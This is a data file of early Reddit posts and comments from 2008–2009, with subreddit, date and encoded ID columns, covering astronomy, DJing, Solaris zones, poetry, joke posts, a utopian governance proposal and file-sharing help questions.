stringlengths 1
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Who cares about circumference. I want to calculate the volume of the universe. | r/astro | comment | r/astro | 2008-11-10 | Z0FBQUFBQm5IcUlYNVhxYll3cU5STlZjckdhbFhZN2Z6MlB1Z2dQX05idkxDXzg4NUVkOVVJOVJoLVg1LXBseDEwdHZFZnBZUHhZNEk5LWF2a2lUTHdtcmhzQTgxV2llYkE9PQ== | Z0FBQUFBQm5IcUowOThKeUluczFfczRoTnBOOTNSZ0RCWDhmUDI3eHAwcnRJYk0tSkx3UXJRSXQ4S0E3VmlUY2dQZDYtd2tHc0VKUlMweTVRX29CUUVWM1g5Zk80MGE3Nk9xckN5OXdSRUxGUGpabXc1dkNOdjZuTS04REVOcTdWZVV2U3BKZm1uUVBoMjEyNUJKc1JBdDJITXAzeVRRT2RIa0ZDakFSRHNJYTZ2MGFENjQ2N3RkZkRBakxsSHp1VU1WSDlhWHZTWXNsbDlab0s4dy1ab0l5dE5JNWxZRE03dz09 |
I'm sure the people that need to read that are on the WorldWideNews subreddit. | r/worldwidenews | comment | r/WorldWideNews | 2009-01-07 | Z0FBQUFBQm5IcUlYSGd1UHZYb1c3Q2xETVZoRnRPTnhUazFJMVNIOVVvamhzWXI3MkpWZURISThEQzlCcF9waHVCUFpoTFRtQU1YNnVuVDVmTjFMQmJTR0dweHdGZkxSbmc9PQ== | Z0FBQUFBQm5IcUowS3dYME5TX3VZNUlTcFNtLThmU3c4cEJtUHFRR2NpbU9JbEQ0eUV3U1dpSnkwZWR0Rk11aE5XaV9paDloYld4NGRJdmxIeXV0b0ZISFNlUHcteGdOX3d1Y1gzX2V2VERWRjQySXpybXdIVTJIRFc1WllPOWEwV04xWW5VM1Rfc0s5QkNZek9CMXJvRXdUekJzSVJmc3BLWHRSV2puR1lQLXBNTG5IZk9uUkt0WFBseDRaSlFmLXZ4OW0tOHpZd0EtT2hFRHV6dzkzUEo2WGtIbGZpZF9oZz09 |
Maybe more people should try non-violent protest... | r/worldwidenews | comment | r/WorldWideNews | 2009-01-17 | Z0FBQUFBQm5IcUlYZDljbURDUkhZUllXaDZFMlZ6NEZLOUZiSUhnVjZtMWFqMWhrMHpWWU9qaVowWnBQOVRQUVBnQzJ3MDZIWEJaU20zdFo3dXpaZ0VsSmN6WUlubHFpanc9PQ== | Z0FBQUFBQm5IcUowOWktTjV2djRVZnJSMmRBT0IyeTJhV3ZiZGNYVGhQc0UwQWhKRWFGRHhEdDV2VTZSbk5pMVpKR0Z0cDZScWRwREFzZmNoamdVVkdPb0dLYkZMR1VfLVlYR2JhaWpwREtLbzdObUxTeXVWY0pIYU1zTG5WLTl1bTJnQ01CXy12T1NYWk56NHpKN003X1NlX2tVLW0yREoxOHZRT2tGX1VveVNqYTBNN3NvZW0xYXJIUENlRllLS3daN2NYa21QRlFGbl8tbzNLWmZZOWZ4V3NRd0h1SGw1QT09 |
I recently have been digging the concept of DJing and just mixing up my own music. What kind of equipment do I need? What tables, needles, mixers, etc would you suggest? Also where would you suggest to look for them? | r/djing | post | r/djing | 2009-06-23 | Z0FBQUFBQm5IcUlYVzNFOS1xUEhsSmZwaElzZllHa0lQQmRaR2hveWU4ZkozdlRRMFJJUXFodjg3dFNRRVFYRm1fVGpZQlBuX2NNZDB1YWJEWkE5UU9qTGlFVkVwZGhqRVE9PQ== | Z0FBQUFBQm5IcUowbmdlTnk2ZUozSjYwZGNFQnBndUVkdjBKR3ZXYmZxUENfNHlXY3BUU19sZ2U0UlR3enpwR2ZQM3QtUDRKalNrck1hWXU1MWdBbGs2aTQ5YkdOaVZTQkgwZ1g5TjNUSmsxcmlsYXpMRDZYbTZXa1ZVTEhuRmZPSkxoRDJOekFYSE5fTFU0NkZhZXhuX0FOWlJvMklNUW1EeHdJQjJuZjZWMUZ3VVFrZW5kZTVqUHlxSDROQjN5VlZuOHRiZElUT2pEbWRWWllablJXRnRJTFpEUkw5djFJQT09 |
It's pretty sad that "obvioustroll" has the top two stories in astro right now. | r/astro | post | r/astro | 2009-06-25 | Z0FBQUFBQm5IcUlYYVc2MWRmQTYzaXhHSkJ4bkdCWFliZGl0Y2ptU3pjMVRTQTV0anp6eVI1b3RuZ2Z3VDAyZUhkUTBmcWlQNHhSeEN2Nnk5SUdUSzFZNGJFNGcxRHp1VUE9PQ== | Z0FBQUFBQm5IcUowcktzY005MXYzSTY2M1RiZWh4a2JyRFROSE5veFF5anczYXlXaDd6RVk0UklSMGhwbk1KeERDNGduU3pQMld1ZEZQYXVhZTRLZHhQakZHcEY2QjFDdm5uLS1IUkRIbzFMSmpZUnJ3N2VmZlk0N1ptUkNCTUtUNHloMWFmWXFUSWoxYXkyVVhxT05LUmxsT1BsVGh5ajFyc3JXTk1wN0cxZ3loTDRtUXFxV0pLeU15ejN4R19BcnF4endDWnlobUtW |
So I just got an Orion SkyQuest XT10. I heard that in order to see the LCROSS lunar impact on October 9th, you'll need at least a 10 inch telescope, so I'm pretty excited. My question is, does anyone have any estimates as to what magnification will be needed to see it? I heard that the crater will be about 5 miles wide, so I'd imagine it wouldn't have to be *too* powerful. I've got the 25mm eyepiece coming with the scope (48x) plus a 3x barlow. I'm wondering if this will be enough or if I should get a stronger one. Thanks! | r/astro | post | r/astro | 2009-06-27 | Z0FBQUFBQm5IcUlYdVRob0xpU2RBeGF6R0U4TUZZazNfc01lT1dweVFNRGt5RG9ndDRvZFpNcDAxTjJmM2htSHRWQS1BYm04Z0pCTUllUjE4SndCUmlXdHhUYk5Ec296UkE9PQ== | Z0FBQUFBQm5IcUowRFlfc1drUklxb19aTm1BZDF2MVI0RGIwQzFsLTdoQzR0UGQzbXA1RzIwWGVhdVNvaGNqRG9taFpaYzEwVnplZVZRNUx2ZHB5OTNUVEZQdHgzelNTaUxjQ3BSa2c4Tko5alNpUmVWeWVib3VKMkVTVWZKZnNzMDhTZmNNTlNRRjd4YWpKSFdVeDV1OE9ydkFDb194QXNZUFgzMHR2OHpkMHNMR3hBcGFNajJ2Y2QzUnltQkN2OFBUVWVHLWN1UjNn |
Hey guys, since it turns out imgur has already taken down two logos (possibly due to reddit's legal team? i dunno.), I have some suggestions for how to handle this and other cases of dead links. And since there are a few other (perhaps already obvious) rules that /r/logo has or should have, I thought I'd make a (really short) list.
* 1) If you submit, keep the formatting we're already using, which is (YYYY-MM-DD) Explaination of Logo
* 2) Link back in a comment to the logo-inciting Comment/Story if applicable.
* 3) If the link goes down, I'd think the last thing we need is lots of dupes. This should be a clear and concise list, so in this particular situation don't start voting something down just for that. Instead, post a mirror in the comments. There's already a lot of reddit logos [here](http://pineapplecharm.com/reddit/), so that'd be a good place to start looking if the logo link is down.
EDIT: kn0thing just posted that any logo from now on should be able to be found on S3 in this format: http://s3.amazonaws.com/sp.reddit.com/redditYYYY_MM_DD.png So that's the new source.
That's it. Hope this helps, and is warranted.
EDIT THE 2ND: These rules can now be found on the right side of the subreddit. | r/logo | post | r/logo | 2009-06-28 | Z0FBQUFBQm5IcUlYQlZvWUtETHhHQmN2TTlBcHhsZU9Qa1VKU2dMM0NZV0JHQXdVYmFMZ21sd2NxckpKNGhXWWd2dGVvQ1c5MXJ2WWFtM3dycU5QNUFaZVdfUVU5ZGQ5NXc9PQ== | Z0FBQUFBQm5IcUowOXY3NWdhQzBIR2xPdWEwR2cyYXRGcmFnQXJFOGFXXzdvZ3ppOVhEaGFOdTc3SHI3LXVqdWZiai1pN2xqOFV3SHlUUTlBZ2JraHNqNzFjX1dVVXl5cGR2c3dyY09SOEF4WTlPUDh0QWpCQzNaUE1oN19YVHZSNkFnMjBjTEh0emVJWTRqNEI3Q2o5U25zRjUta1hURVhsZ1JLY1ZGNEQ0ejd3RUdHb1djb21RPQ== |
After kn0thing's post I made a quick perl script to look for every day. I'm too lazy to make a post for each one so here's the list:
As far as unnecessary dup subreddits, this one takes the cake for being the most unnecessary and absurd.
I'm telling you guys not to bash you, i'm telling you this so you can go sub to those instead. | r/howtodiy | post | r/HowToDIY | 2009-07-13 | Z0FBQUFBQm5IcUlYZHVlSnF0MGtLMW5ya2dRN24wSTVya0ZzYlhJTFBEZEdQT3czM2xydGhqTmhjck9pRXA0VE9aOEZKQmFVdktBV29LSWVnQXNUNlQ4bFhOVDllT0x1a0E9PQ== | Z0FBQUFBQm5IcUowUHA0b09sSXF6dWw3SlJ2bnR0TkFqRXZXVlZWV0ZiWXZ0WUtGblBweDlnZjZnakNNM3p4RDlDU2U2TzVzT1RVWDBiX3Z3MjJkSkRrVWFyNUVDT3Z6ZFdoWXAyaDZLbkQ5VFdFVThZUnhFdGczVWJTTVpCbkgtaWtScVU4QVB4OG9pdGJHYnZNUVhzdlppUlA1S3hMTGxCeDRTVlRWamw3a3pCV1hVZ3ZXa3puQmxHd3V0Y0QtOGtlWnZlS1d1OWVGMFR1dk1CVGhTbGZpWTVCc3FTYmdXQT09 |
I love textsfromlastnight, FML, Awkward Family Photos, Mostly Drunk Texts, and STFU, Marrieds.
Any other cool ones you guys know about? | r/schadenfreude | post | r/schadenfreude | 2009-07-27 | Z0FBQUFBQm5IcUlYbExfeFMxMGR1WlZjMVlkSnA2bHNEWFlFbEhGb3hMY0pROThvQnRSeElNZnFKUXhMOV9TSDJYZEUxeF9TX3RkYWVjMVh5bkIxQklGSUZGTjl4UW45c0E9PQ== | Z0FBQUFBQm5IcUowb2g4SjlPSnlzU0E4ZWhIRlNvZHRGU1VmMkM4SkFVRm85Sl83a3kzdzA2dWRuWS15RmVQYmdEOUJlVk4zLXFOYWZXbnlvOWRJNUxQWGRFaHpEVzRadkNLdWo0UDl6bDZ1R1BYbWxqRFlTUlVnR1FDcUVtcmlwUS1zRWZHSGtTWm9ZMW5OQjA3M3FrNE95aTdQWkNtcDZ1YUNXRnVfVUdtNG93NHVZVFFWVmpfaERELUZfWDJxQkxEOHQyNWV0S2JYalNldnJMbEp5WDJJYWl5clV6NmxnUT09 |
Okay, so as an Ubuntu user, I figured a Nexenta install would let me enjoy the niceties of Solaris without having to re-learn a whole lot. Plus I like apt. Now, maybe it's just my system, but this is the following shitstorm I've had to deal with:
1. **zoneadm clone** doesn't actually clone, it copies. This is regardless of what zfs-mounting hack I use or variable I try to export after Googlin'.
2. **zoneadm clone** doesn't even fucking copy, it crashes trying due to a broken program.
3. **zoneadm detach** doesn't work right, calls attach instead half the time.
4. **zoneadm attach** doesn't fucking work, period. Runs out of memory on a system with 4 gigs of RAM.
5. In a Nexenta Zone, installing via apt-get is broken. It calls rc.local, which hangs, meaning it can't finish the installation of apache or postgreSQL unless you remove references to rc.local from the post-install script and re-run apt.
6. Actually cloning a zone consists of the following:
* Make a new ZFS filesystem (say, mainpool/DeleteMe)
* Mount it where you actually want it (say, /export/DevZone)
* Set it up and install the Zone, then boot to test.
* Halt the zone and Unmount the soon-to-be-deleted filesystem.
* ZFS clone the actually zone you want to clone. Mount it to the same spot.
* Boot your newly working cloned zone.
I'm not sure if ZFS makes this easier or harder, but can I just install _real_ Open Solaris to a new ZFS filesystem and have that boot instead of my current Nexenta setup, then attach all my Zones once I get there? Nexenta has _too much broken shit_ at this point to be worth the hassle. I'll fucking _learn_ Solaris's packaging system.
I beg anyone who knows how to do this for help. I'm so sorry for not knowing better >_< | r/solaris | post | r/solaris | 2009-07-29 | Z0FBQUFBQm5IcUlYRlBPbzA5TXFjTUN3RXpzZHkzRUp5bXBSLVZUb3ItNUxfaktVMlR5OEJDVWhOYllvakJlcXplWldkOV9CWEJ0bkNzVWptTGdZWFY5MUdTZ29pMUlYS2c9PQ== | Z0FBQUFBQm5IcUowR3F4UURJcWlUMFpOTS1hMnhrSTNVcXMyRVJDRDI2VTFuOWlkVWNOamZmMFQ2UDlYb2NCZ0twRVh3SThCSkhoTVhUVkJvSjl0QUE2cjktc2VkMTRneUgzMV9WSlhGbjV2dEc5ZkZlcDA2elRqT3ZnRDZkSDNTTDE5SEpCUXlKOUg2cnJqSldpYjU5MU5GSndEOW9pTEtKTEpuQ3hWSmVwU29BY3p2d3Y3MTlvdklyYXpDcjZxOUZmeHNPU3Q5aGhB |
To dream the impossible dream
To fight the unbeatable foe
To bear with unbearable sorrow
To run where the brave dare not go
To right the unrightable wrong
To love pure and chaste from afar
To try when your arms are too weary
To reach the unreachable star
This is my quest
To follow that star
No matter how hopeless
No matter how far
To fight for the right
Without question or pause
To be willing to march into Hell
For a heavenly cause
And I know if I'll only be true
To this glorious quest
That my heart will lie peaceful and calm
When I'm laid to my rest
And the world will be better for this
That one man, scorned and covered with scars
Still strove with his last ounce of courage
To reach the unreachable star
[Listen](http://www.reelclassics.com/Audio_Video/Music7q/manoflamancha_otoole_impossibledream.mp3) | r/utopia | post | r/utopia | 2009-08-05 | Z0FBQUFBQm5IcUlYUGpPS2VRVTdsQXVoZU5JQ0dmMlBkeUVrQ2Z4WHlFblI3aGwwV3RVY0JmRmNyb25sN2ZNYlQ3OVJ6TlVMOVpzNnZkcGMwREcxbWNWQzhGUm56RHcxN0E9PQ== | Z0FBQUFBQm5IcUowaTNWNklMek9ZWHhENGRPTXBVVXJFQ21qWUliRHpVQ19KdHoyc1FJWjI2RzVPdjVXN0xGd292MnZySW5kMHRYSFhzR2ZBUEowU25KeXVXZTNJcUN1cG13b2R5MmpVVmlUblhUVS1saEV1OTZpaDQ3MFAwVFBFUV82SlJaVGpMNGRTS3U2U2p0OUwtYUpXSlY4dTd3eGhBMUE5TDUzbklCVUUyUjJURXNjSmwwPQ== |
malkovich. malkovich malkovich malkovich; malkovich!
malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich. malkovich malkovich, malkovich malkovich (malkovich malkovich). malkovich malkovich malkovich malkovich? | r/malkovich | post | r/malkovich | 2009-08-05 | Z0FBQUFBQm5IcUlYV1JVMEVQak5zTlhwNGF3ZGR4bHVncnBvcEJKV29SeUVOc1RHMkRLY3pZLXV6eUVrQXFYWmdVMXQ0UHZqMFZzM09DTFVWVDgzRXFvQWxENlE2V1FKT3lUdVBMeHMzUm5LVjZnSVVDZGhxa2s9 | Z0FBQUFBQm5IcUowYy1zTjRLT05lcHVXcWwweXhDMUdVZVpTaHVDdFpYaG1TcVlKNDZwUk9wVnBOOEo3bUtzeERXSGZIREZmZV9fVGkwLTIxRlFqZm8tNmFoS2diSjNNYXd3ZzdHMlgtR2psUzZ6QWZKUmVKS3gxUXFaaDVFLU9SdURWLXpNcjZ5SDQtQVVaeF9iam5VMGRUUjRXSEtFdG1lWGlLSUEzRHZfSXg5dHY0bjh0djBrOTRtR0dEOUlnYnpBc25fLTNIWnNj |
malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich. | r/malkovich | post | r/malkovich | 2009-08-05 | Z0FBQUFBQm5IcUlYZ2dfOGhXQlRfMnMwaG9JWHJvclBRSDd5eWVLczl0RnlXc3psUF9ySVZqU0ZwVUdZTWdXVnppYTVWUjJ2REZEWTNpcnFvMTZPbXlxWGY3anNrVTZ1T3JGc0pyTkNFa1ltSzNpV1pfUkFxUEE9 | Z0FBQUFBQm5IcUowcEh4NXY0VWI5Ul9rUjNnMU9OdjZEbk4yQ2Faa2hCX1RCV0UtOFV4YkRDcU52cWZZT0NFMk56QTlOWFlKUG5Ib0c5a2FSMVphc2ktazlvaC0zLURDOVRGMVVOcm4wMFhQelF0R011UGJ2WFNobXJXSUp2djZwVTBrOFcyUVRyRXRDa0lfS1MtN0tjdGpyY3lMRHdSNkVKZnhIRVVrQTlzWHlUZWtieHJENE5Hc1FNa2xYRDNqWTJGVFBPc3B6RFhMQTVrQ3JGenoxSXBvaWMtVEhjSlNBQT09 |
malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich. malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich.
malkovich malkovich, malkovich malkovich malkovich. malkovich malkovich malkovich, malkovich malkovich: malkovich, malkovich, malkovich.
malkovich & malkovich malkovich malkovich malkovich malkovich. malkovich malkovich malkovich.
malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich. malkovich malkovich malkovich malkovich malkovich. malkovich, malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich malkovich. malkovich malkovich malkovich, malkovich malkovich malkovich. | r/malkovich | post | r/malkovich | 2009-08-05 | Z0FBQUFBQm5IcUlYeGZFZHBSVVhkVnNJcEdSUEFzRE9aWE1rYzl3Qi1lM0IxQ29uaDlkVDRadjR3UTVsSV9sNVZlSVIyY2thVmxTVG1ZMFN4RVIxUDBrZDJRV2Z4cDkxTzV5dzF4bTkzMnYyWDFXb0dIcDMzZE09 | Z0FBQUFBQm5IcUowenFsU0xqdElhSzh5ckl6RW11OXBXbFVfbm5wWWFQVTlZeGpZT3dwSjlPdTYxWjRUMFZKVnQ3dFU1ZlRlZFlWdEU0Q2RlOThNeWRhcnJkdHNjb0tVenI4QllnbDF3dHIyMkZhWmpIaWxzQ015QTV3a3ZOMFA0c3lkdkVLZmxmMzg5YXhkY2hnVmtGal94Q0Zuem5WNUozNTdSdGRMVFZCWVhmeXNDMWwtRDJHT1FEZUZ1QW90LVBXTHpJS1hzTzczWWtreWU1UTR2WWxWemxPLS1qU3dYdz09 |
Not like the brazen giant of Greek fame,
With conquering limbs astride from land to land;
Here at our sea-washed, sunset gates shall stand
A mighty woman with a torch, whose flame
Is the imprisoned lightning, and her name
Mother of Exiles. From her beacon-hand
Glows world-wide welcome; her mild eyes command
The air-bridged harbor that twin cities frame.
"Keep, ancient lands, your storied pomp!" cries she
With silent lips. "Give me your tired, your poor,
Your huddled masses yearning to breathe free,
The wretched refuse of your teeming shore.
Send these, the homeless, tempest-tost to me,
I lift my lamp beside the golden door!"
—Emma Lazarus, 1883 | r/utopia | post | r/utopia | 2009-08-06 | Z0FBQUFBQm5IcUlYbHR0Q1Vra3hIcnJ3NkhvQ2UxRERud18xV09aLW9YZXR3R19zeGpaWjBPQkJaYnBUa0szTEtBQTg0d1gwaXFaSXJYUXlQQXVtUkZ2Umw5ZmRLRlVqNGc9PQ== | Z0FBQUFBQm5IcUowbGlOMmNsNmI3TE5KaEozcEM4T1lWelkwallwbFZEeVpCRTZvc2loNWZJNGppWGxYUzJtOTBWZHI5ZFJ1eVcxbUlHOWloemdnUkFxMGN1Z3pEQTB6SnRkVjJpXzVOQWxtOEhMYTJMdFNyY0xOVFlOUW1KcDBpVXk1Z0RqWGcwUmhzRXFheUZFUno3Wk9HdjJYUklWajFlNGZfS1RyTDZrVGlodE1nbEpRN1o4PQ== |
I'm tired of people saying they need to accept themselves.
Accept is what I do with my parents who won't understand why Shakespeare is taught in school.
Accept is what I do with the mole at the base of my spine.
I am done merely accepting myself.
I want to celebrate and cherish myself.
I want to become my own loudest cheerleader and scream how great it is to be me.
And if I'm not excited by who I am, then I need to change.
I need to remember who I was before I was unhappy.
I need to invite the parts of me I have rejected home.
And when they finally do come home, I'm not just going to welcome them to the party:
I'm going to run out into the street and tackle them there.
I would do that for a long lost brother, sister or friend.
Why wouldn't I do that for myself?
I'm done having the same response for my own thoughts, dreams and emotions that I do others'.
I am here to be me, all the time, to not be me is to deprive the world of my contributions.
To hide away is to make the world a slightly darker place.
I am not being selfish, this is my celebration, I am a virtuous force in this world.
And I can remake the world by simply being who I am.
And showing it to others.
| r/utopia | post | r/utopia | 2009-08-07 | Z0FBQUFBQm5IcUlYampfRmREQTl2V09rSFgyczVxSW4yX0swV2hyQURvR2Z0M1lBcnBOdE12SElxRnhETkR0QWQxbmFZNUN6djJ2MnRoNms3aEtaWVczSWlwa20tZnNtNGc9PQ== | Z0FBQUFBQm5IcUowaXBsSEN6QVU3MFhFUUNUMzBlUGd5TDJMNXpsSWxQaDFnNFdGWkZwX2JhM2t3WnJaaTR1bU11TVh5eG5jbFgyekFpaW42S2VEUVNMS1VVYmUySXM2bEJ5bDJIRUxZQWZHZ3NqUHkzZzQ3UW81TkltNkhfU0ROekZIaE9OQU5yaTdGd3hOVTFVaGkyMF9mNmxrSzNMcURpRm83bTFtUW01Vy16MVprNlJBR0dNPQ== |
But before they knew that they kissed. | r/spoilers | post | r/spoilers | 2009-08-08 | Z0FBQUFBQm5IcUlYR2Jxd1JsUUtHMGxkNGYzVVJTeGtaSkZUVTRyLTBBOTZybk1RWWw5dVQwQVZ4UnRaYm4tTXBIWlNJVU95RDVzaFRpSjBYelB2aWg1dlFpbzJBTUFna0E9PQ== | Z0FBQUFBQm5IcUowMDhJWHgwOVh0Qkp1S1I2Z0lLQVlYdFdFX2JVc1plLWlJeC1ibWVCYjhTMVBZS0JHQnhtMHkyRGw1YlY1bkhJR0ltOU9hclk2WlBZaUw3SFdnVmJxVy1leDBDTnJsTHRReFl3M2czdUdBNVJsVHhTZWtBdTQ1ejhTS05mNzBsTXlWWFNDbThEbkNodjJvOUlHbVNBY2ZMbWhGWm9QaWVid0ZRQ0xTckkwTTZQNlRDaDNjemF6b193U0xPblRGUlNO |
But Dr. Manhattan is ok with that since he just doesn't care anymore. | r/spoilers | post | r/spoilers | 2009-08-08 | Z0FBQUFBQm5IcUlYVk5sY01Lb2t5NFhvQUgzaVZvMnF6QWpRejFkeGRPaXVYMktYaWVQX1JYSVk4N1JwZ2NyWmJEWWoyYVYtbGk3MGtXYXFyaXlJZlM3ckRuUFNlN1pUaGc9PQ== | Z0FBQUFBQm5IcUowRGpBWGlNVE5wdGs0bjhrV3ZpWG9yQk55c2JKSWlJMW5xdFEtUk5FQnRVTUhDOWljRFhfd0JiaHJNVk9ZQ05JSzdvZTdBejhLaDFaZW1VamhGZkF1SmZHUnMtWFVCT3BkUExQdTFLS2dBcW0tWGl5RlRQRWJGYVQ1OE0wZ2hxX0NqV01vRUJHMkJxQVhlU3V5NkZTVkNRd0RHWDlNZC1CSWN3T3JtTmJwZzQ1TTNCYzVWSzY4NW1GVERyVWJPVFhz |
The Legislative Branch:
Federal Government will get to make Metalaws. It will state things like "Everyone is equal under the law" and "Don't pollute".
State Governments will define the specific laws based on metalaw: "Murder is forbidden because it makes someone unequal." (this is just an example)
Local Governments will enforce the laws and proscribe punishments: "Arrest people who commit murder, stop people from committing murder."
Every law must be renewed individually, every ten years.
The Judaical branch would be in exact opposition of the legislative branch:
Federal Judges will interpret state law.
State Judges will interpret local law.
Local Judges will determine where public funds go.
The executive branch only exists when the legislative and judicial branches agree that it is required and only for a limited duration.
Only the executive branch can maintain or use military forces.
Troops can only be sent out of the country, if there is a war council.
A war council is convened by the power of the Executive, Judaical, and Legislative Branches for a limited time.
At the end of said time, the war council will be dissolved, and all it's members are considered guilty of murder.
A new war council can be convened as soon as the last is executed.
If no one can be found to willingly execute a member of the war council, they will be allowed to renounce their citizenship and move to the invaded location.
The system starts with the following metalaws:
All people are equal under the law.
If you accuse someone of breaking the law, and they are found to be innocent, you are responcible for 2 times their cost.
Taxes may never be over 5% in any type of measurement.
Do not murder.
Do not steal.
Do not injure.
Do not rape.
Violent offenses are to be punished most harshly.
A person of average intelligence must be able to memorize all federal metalaws.
Any politician who can not recite the metalaws can be removed by anyone, at any time, by someone who can. | r/utopia | post | r/utopia | 2009-08-10 | Z0FBQUFBQm5IcUlYSElUQTBIVVk3UHlfQjRodmhqYl9LWWpOaEtKZHZoZV80SWRtMVBKOHItVVg4UGFWbHdaUE9KUWt2VVJuXy1GNzROaXR3MXRXLTZWT0hCMHlTTUhpMnc9PQ== | Z0FBQUFBQm5IcUowa2c5RHF1TzF6eXc3ZXBQblU0cWRqYlRmekowRWNUN2lrU2d1NlVPNFRrb2s4a3ZBMlhVamVjWmhscU1iSG1EcjlFcThVOTVjLXUwdjIyT21WU3NQVnVpa0hwVm4tbjZ6QUJfYkItbkxOTi0tOU5qbjRRNE5NalcyQUxPR0VXbS1OcS13RWF6NTNZNVlYSFQ5QVdha3F2OXZJZGU3cVA5TGpxM2dpeWJOZU1GeTRDZ2RGYkNfU0xad09PdU5tRnpw |
See [here](http://www.reddit.com/r/Austin/comments/99imi/raustin_logo/c0bwv0k) for what we have in mind. Could someone possibly slap something together? Austin would definitely appreciate it. :) | r/logo | post | r/logo | 2009-08-12 | Z0FBQUFBQm5IcUlYRk9KMmJoOFhYemF0eXhFYV9iS2tMSndhZUFXMXJCbWctVHYyX0RoVndETnlyT0JjcEp2cW5LLWtvLVlhX0dDT0pmUFN6dC1CYkdCd2xyRHh5Q2dsTVE9PQ== | Z0FBQUFBQm5IcUowdWVSUGRiTXk2elFKZTkzT2hWTF8yZWZYdnQ0c0stel8xYjBLQm5GSXNMYjlERnE3MzVlMXdNai1ZaWtjcXZUTHF1OVV5R0V0WFh2YmNFdlh4WFo1Vk9NNUR4MzZLcDFrcnFYa1FHMW1aYWpUMktMTjlvMW5fMGxueFRZOUltV1Z0MTh3YWdDNTBpN2JZWXJuZmN6U3FMWTJ0MERRTHd2cW8zMEFQVTROS2dhdklseU45b3pJSGp2Nl9LVFFnWDJw |
Leave a message, I'm not going to be on here for a while. | r/utopia | post | r/utopia | 2009-08-12 | Z0FBQUFBQm5IcUlYbVo1MHhxc3NJblotLTdIbmpJRnRqYVBDdm12N05pLUhxWGUwNUpsZk5CdUxrVkRmZjJ4TFZPUVhvY0FZVV9tTUZuaHJhWmg3WlltbFZYZEIzeDBrMWc9PQ== | Z0FBQUFBQm5IcUowXzVSc2UweHBRWW5iS0tjUk1EWnBlNGFpUjhmS2ZrM2lEUmV6cVJGNlRrdjV6b2RtMW0yWUZkdzVvOWVrZmcyRjVmRGxQa0E5MEJFWVlkTWZ0TEVSUFFpY2E3ZldZTHd0S1RfVDRtSElraDFMY2FxbkpnYjN5cXhqMWZqVm5USkFjRnRGTjM1Nm5iX0UxOGhSbEd6eWQzSnlxcWhjRms3X0dzTVJrR1pab3hBdTRaZGFEdXNOZFJCMDlVYmpoTkxIRVhhaWdzOTNuN0dPSzZsTlJtd2I4Zz09 |
Kann die Railo Community Edition ersetzt werden durch die Railo Opensource Version? Ja, und zwar einfach mit wenigen Handgriffen. | r/coldfusion | post | r/coldfusion | 2009-08-14 | Z0FBQUFBQm5IcUlYc1VId1JxZGVBcEJJa0wyV1lwbzg0NzFFZlJMTXI2NUI4OFFDb1k3TmgyRURsdFhkcDBfWGtYd29QRnR1NFZSUE4taTNRekl6dkVkM0p2RWxtWVNMVnc9PQ== | Z0FBQUFBQm5IcUoweW9JSlNqVEFVM1VWdHV2V3k4X0s5bnlKd3k2ODFMQmFhRWJRTjZkSUJxd3VHT2lMUnBiMTh5Z2U1dXF5M3R3X2VwUDJmVWQzbFcxdmZwbnVkbzVuRmJYRFZEaFZGMFdOY3BjMG1qdklqVFpzWlk3M0lEaFd0akFIbVpvZ2tBVk9KLU9yUzJZN1hHOXZfRDk5TGM0bno4eUpXQ3JuTGVwVnZpWGJTRmx2UVZfazBfTWJXY203ZHh3enJTbVc2djM5OEZhOUhaSmlSMkN2WldkS1dFbkNsQT09 |
I have an unlimited data plan with AT&T for my Blackjack II. With a little finagling, I can connect it to my laptop through USB and use it as a dial-up modem. I get pretty good 3G speeds, up to 100kbps at times.
I'm currently a college student living on campus and a little wary of using the school's network for torrenting. Is using my phone for this purpose any better or worse an idea? | r/p2p | post | r/p2p | 2009-08-28 | Z0FBQUFBQm5IcUlYalNPdDdSeDV2ZTZoRUlRUXdVNElkcEtHNV92SjZEUnFCQWlwYVFUM2VLeVdoUDQ0bWI5bWw2LXRtWDVQU1hZd0U1V05xMy1OZFA2aDRTTXA5YjdsMkE9PQ== | Z0FBQUFBQm5IcUowUU0tUUhOX3FKd0dqMmsyQmVNcjBnYk9UcmpwZVQ0SnczM0tfVnlQQ3hKR005alUzMTVOWDlaNmhoRDlaR0NYQW5nMHZWRS1vTV84cGNjZURHTy1NSkhZMjhhTDVkUzhCeVl6MVZULXNhSllsMGNkMGV1SDNaeUVGbElHdkJWSXNmei1nSlRiQ0o0X04ybjBnVFNSSTlZV284bUhuYUlZSGFDWmRwVEpYZjlsaF93dHMzVEt6OUhMNVNHc01Ma0lH |
I get
Unable to connect
Firefox can't establish a connection to the server at www.demonoid.com.
* The site could be temporarily unavailable or too busy. Try again in a few
* If you are unable to load any pages, check your computer's network
* If your computer or network is protected by a firewall or proxy, make sure
that Firefox is permitted to access the Web.
Even with my firewall turned off I cannot connect to it, Any help? | r/demonoid | post | r/Demonoid | 2009-08-28 | Z0FBQUFBQm5IcUlYNWphX3l6RWp3aXNKMzlsWENSc0tMeFVidm11TlF3YjlfNFlxRm41bC1fUkkyZWpmWEc1cGlmMDMyVmxEQWk4YnJvNGgxSGNMc0h3X2RHMkpsMTFfckE9PQ== | Z0FBQUFBQm5IcUowVC16cHNLbW9jMzJyeEFGRkdsR0xMTlN0bmVmQnJ3aU91THhUZFVSXzJ2YlpxTzRtM0NjYVE1NEtXTk1Uams0UUZqVkxacHgxSVhjOVFia0VUbVFGWTFNWEFMTVE2ZldLM19JX1QteXBnb1B4bXAwbWZubWctQm9YRDZvSXdfLXJuSTdkTFp0ZmlpM2lWcW5ORERsU2RDVUxfN0htN0trRTNORG9JdjlrYkZNOF83YVktcXVpNWtGNFB4ZFlHN0ZQV0dVYWVxNXRhUEtuRU5RU1pzdWFPQT09 |
